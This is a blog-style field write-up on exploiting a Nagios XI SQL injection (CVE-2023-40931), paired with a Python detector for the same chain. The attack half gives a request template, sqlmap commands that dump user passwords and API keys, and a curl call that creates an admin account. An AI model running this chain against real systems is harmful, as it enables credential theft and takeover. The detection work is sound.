Notes From The Field: Exploiting Nagios XI SQL Injection (CVE-2023-40931)
This CVE affects Nagios XI 5.11.0 and 5.11.1. It does require authenticated access into the Nagios environment.
URL Reference:
Description:
A SQL injection vulnerability in Nagios XI from version 5.11.0 up to and including 5.11.1 allows authenticated attackers to execute arbitrary SQL commands via the ID parameter in the POST request to /nagiosxi/admin/banner_message-ajaxhelper.php
In theory, with authenticated access you should be able to send a POST request that acknowledges a banner message, supplying the ID parameter.
Example:
action=acknowledge_banner_message&id=*
You should be able to refresh the Nagios page you landed on while authenticated, capture the request, and send it to Burp Repeater as a POST. If you want a POST request template for this exploit, use the following; just replace the Cookie and Host fields.
POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1
Host: <host_goes_here>
Cookie: nagiosxi=<Authenticated_Cookie_Goes_Here>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
action=acknowledge_banner_message&id=*
Once you send the POST request you should receive a SQL error back, which essentially confirms SQL injection.
Automating SQL injection with sqlmap
Having a wildcard in the POST request may interfere with automated SQL injection, so save your POST request from Burp Suite with id=1 instead of id=*.
Your sqlmap command should look like this; as a reminder, the parameter we are targeting is “id”.
If all goes correctly, sqlmap should confirm the injection and fetch the database names.
Next, go ahead and fetch the tables from the nagiosxi database with the following request.
sqlmap -r request.txt -p id --threads=10 -D nagiosxi --tables
There are two different ways I normally dump tables. First dump all table names, then run a second command to pull the columns from the tables that hold the most meaningful information.
Dump all columns from the xi_users table
sqlmap -r request.txt -p id --threads=10 -D nagiosxi -T xi_users --dump
Dump the following columns from the xi_users table
- user_id
- name
- api_key
- password
sqlmap -r request.txt -p id --threads=10 -D nagiosxi -T xi_users -C user_id,name,api_key,password --dump
Exploiting Nagios API Keys
Using searchsploit you will find a ton of Nagios XI RCEs. After searching through various scripts, I came across a Ruby file for a chained RCE that included an exploitation step using API keys.
Constructing an API key request to add an admin user with curl
curl -k --silent "http://hostname.domain/nagiosxi/api/v1/system/user?apikey=api_key_here" -d "name=hacker1&username=hacker1&password=Hacker1337&email=hacker@localhost&auth_level=admin"
At this point you should be able to log in and change the password of your newly created account!
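From the defender's side, both steps of this chain leave a recognisable footprint in request logs: the banner_message-ajaxhelper.php POST shown earlier carries a non-numeric id, and the API call above creates a user with auth_level=admin through an API key in the query string. The following detector is an added example written for this post, not code from Nagios or from the original author. It assumes request logs that include the form body (for example from a reverse proxy or WAF configured to log bodies), and it assumes the legitimate banner message id is an integer, as the sqlmap step's id=1 suggests. The sample requests are constructed, with a redacted cookie and API key, and the hostname is a placeholder.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests (not captured from a real system). The first two mirror
# the banner_message POST from the post, the third the API user-creation call, and the
# fourth is ordinary benign traffic.
SAMPLE_REQUESTS = [
    "POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1\r\n"
    "Host: nagios.example.internal\r\n"
    "Cookie: nagiosxi=REDACTED\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 38\r\n"
    "\r\n"
    "action=acknowledge_banner_message&id=*",
    "POST /nagiosxi/admin/banner_message-ajaxhelper.php HTTP/1.1\r\n"
    "Host: nagios.example.internal\r\n"
    "Cookie: nagiosxi=REDACTED\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 38\r\n"
    "\r\n"
    "action=acknowledge_banner_message&id=7",
    "POST /nagiosxi/api/v1/system/user?apikey=REDACTED HTTP/1.1\r\n"
    "Host: nagios.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "name=x&username=x&password=x&email=x@localhost&auth_level=admin",
    "GET /nagiosxi/index.php HTTP/1.1\r\n"
    "Host: nagios.example.internal\r\n"
    "\r\n",
]

BANNER_HELPER = "/nagiosxi/admin/banner_message-ajaxhelper.php"
USER_API = "/nagiosxi/api/v1/system/user"
NUMERIC_ID = re.compile(r"\d+")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and form body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    form = {}
    if "application/x-www-form-urlencoded" in headers.get("content-type", ""):
        form = parse_qs(body, keep_blank_values=True)
    return {
        "method": method,
        "path": parts.path,
        "query": parse_qs(parts.query, keep_blank_values=True),
        "headers": headers,
        "form": form,
    }


def classify(raw):
    """Return a list of findings for one request; an empty list means nothing suspicious."""
    req = parse_request(raw)
    findings = []
    # Step 1 footprint: the banner helper expects an integer id, so anything else
    # (a wildcard, a quote, a tautology) is worth an alert regardless of outcome.
    if req["method"] == "POST" and req["path"] == BANNER_HELPER:
        for value in req["form"].get("id", []):
            if not NUMERIC_ID.fullmatch(value):
                findings.append("non-numeric id to banner helper: %r" % value)
    # Step 2 footprint: user creation through the API key, with admin level being
    # the case that matters most for a stolen key.
    if req["path"] == USER_API and req["method"] == "POST":
        if "admin" in req["form"].get("auth_level", []):
            findings.append("admin user creation via API key")
        else:
            findings.append("user creation via API key")
    return findings


def scan(requests):
    """Map each request index to its findings, keeping only requests that triggered."""
    return {i: f for i, f in ((i, classify(r)) for i, r in enumerate(requests)) if f}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_REQUESTS).items():
        print(index, findings)
```

The numeric check is deliberately strict rather than a blocklist of SQL keywords: a request that reaches this endpoint with anything other than digits in id is abnormal for the feature, so it is a low-noise signal. If a hit shows up, the API key of the account that issued the admin-creation call should be rotated along with the session, since the chain above shows that a dumped key is sufficient on its own.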